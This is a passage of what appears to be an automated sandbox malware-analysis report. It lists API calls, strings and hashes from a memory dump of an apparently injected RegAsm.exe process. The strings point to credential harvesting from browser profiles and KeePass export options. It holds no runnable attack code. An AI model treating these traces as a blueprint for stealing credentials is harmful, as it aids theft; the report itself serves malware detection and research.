                                                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                          • API String ID: 4111938811-1819279800
                                                          • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                          • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                          • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                          • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                          • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                          • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                          • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                          • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                          • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                          • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                          • EndDialog.USER32(?,?), ref: 0040135E
                                                          • DeleteObject.GDI32(?), ref: 0040136A
                                                          • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                          • ShowWindow.USER32(00000000), ref: 00401398
                                                          • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                          • ShowWindow.USER32(00000000), ref: 004013A7
                                                          • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                          • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                          • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                          • String ID:
                                                          • API String ID: 829165378-0
                                                          • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                          • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                          • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                          • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                          APIs
                                                          • memset.MSVCRT ref: 00404172
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                          • wcscpy.MSVCRT ref: 004041D6
                                                          • wcscpy.MSVCRT ref: 004041E7
                                                          • memset.MSVCRT ref: 00404200
                                                          • memset.MSVCRT ref: 00404215
                                                          • _snwprintf.MSVCRT ref: 0040422F
                                                          • wcscpy.MSVCRT ref: 00404242
                                                          • memset.MSVCRT ref: 0040426E
                                                          • memset.MSVCRT ref: 004042CD
                                                          • memset.MSVCRT ref: 004042E2
                                                          • _snwprintf.MSVCRT ref: 004042FE
                                                          • wcscpy.MSVCRT ref: 00404311
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                          • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                          • API String ID: 2454223109-1580313836
                                                          • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                          • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                          • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                          • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                          APIs
                                                            • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                          • SetMenu.USER32(?,00000000), ref: 00411453
                                                          • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                          • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                          • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                          • memcpy.MSVCRT ref: 004115C8
                                                          • ShowWindow.USER32(?,?), ref: 004115FE
                                                          • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                          • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                          • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                          • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                          • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                            • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                            • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                          • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                          • API String ID: 4054529287-3175352466
                                                          • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                          • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                          • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                          • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                          • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                          • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                          • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                          • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                          • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                          • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                          • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                          • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$HandleModule
                                                          • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                          • API String ID: 667068680-2887671607
                                                          • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                          • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                          • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                          • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _snwprintfmemset$wcscpy$wcscat
                                                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                          • API String ID: 1607361635-601624466
                                                          • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                          • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                          • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                          • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _snwprintf$memset$wcscpy
                                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                          • API String ID: 2000436516-3842416460
                                                          • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                          • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                          • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                          • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                          APIs
                                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                            • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                            • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                            • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                          • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                          • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                          • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                          • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                          • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                          • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                          • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                          • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                          • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                          • String ID:
                                                          • API String ID: 1043902810-0
                                                          • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                          • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                          • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                          • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??2@??3@_snwprintfwcscpy
                                                          • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                          • API String ID: 2899246560-1542517562
                                                          • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                          • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                          • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                          • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                          APIs
                                                          • memset.MSVCRT ref: 0040DBCD
                                                          • memset.MSVCRT ref: 0040DBE9
                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                            • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                            • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                            • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                          • wcscpy.MSVCRT ref: 0040DC2D
                                                          • wcscpy.MSVCRT ref: 0040DC3C
                                                          • wcscpy.MSVCRT ref: 0040DC4C
                                                          • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                          • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                          • wcscpy.MSVCRT ref: 0040DCC3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                          • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                          • API String ID: 3330709923-517860148
                                                          • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                          • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                          • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                          • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                          APIs
                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                          • memset.MSVCRT ref: 004085CF
                                                          • memset.MSVCRT ref: 004085F1
                                                          • memset.MSVCRT ref: 00408606
                                                          • strcmp.MSVCRT ref: 00408645
                                                          • _mbscpy.MSVCRT ref: 004086DB
                                                          • _mbscpy.MSVCRT ref: 004086FA
                                                          • memset.MSVCRT ref: 0040870E
                                                          • strcmp.MSVCRT ref: 0040876B
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                                          • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                          • String ID: ---
                                                          • API String ID: 3437578500-2854292027
                                                          • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                          • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                          • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                          • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                          APIs
                                                          • memset.MSVCRT ref: 0041087D
                                                          • memset.MSVCRT ref: 00410892
                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                          • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                          • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                          • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                          • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                          • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                          • GetSysColor.USER32(0000000F), ref: 00410999
                                                          • DeleteObject.GDI32(?), ref: 004109D0
                                                          • DeleteObject.GDI32(?), ref: 004109D6
                                                          • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                          • String ID:
                                                          • API String ID: 1010922700-0
                                                          • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                          • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                          • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                          • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                          APIs
                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                          • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                          • malloc.MSVCRT ref: 004186B7
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                          • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                                          • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                          • malloc.MSVCRT ref: 004186FE
                                                          • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@$FullNamePath$malloc$Version
                                                          • String ID: |A
                                                          • API String ID: 4233704886-1717621600
                                                          • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                          • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                          • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                          • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _wcsicmp
                                                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                          • API String ID: 2081463915-1959339147
                                                          • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                          • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                          • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                          • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                          APIs
                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                          • API String ID: 2012295524-70141382
                                                          • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                          • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                          • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                          • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$HandleModule
                                                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                          • API String ID: 667068680-3953557276
                                                          • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                          • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                          • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                          • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                          APIs
                                                          • GetDC.USER32(00000000), ref: 004121FF
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                          • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                          • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                          • SelectObject.GDI32(?,?), ref: 00412251
                                                          • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                          • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                            • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                            • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                            • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                          • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                          • SetCursor.USER32(00000000), ref: 004122BC
                                                          • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                          • memcpy.MSVCRT ref: 0041234D
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
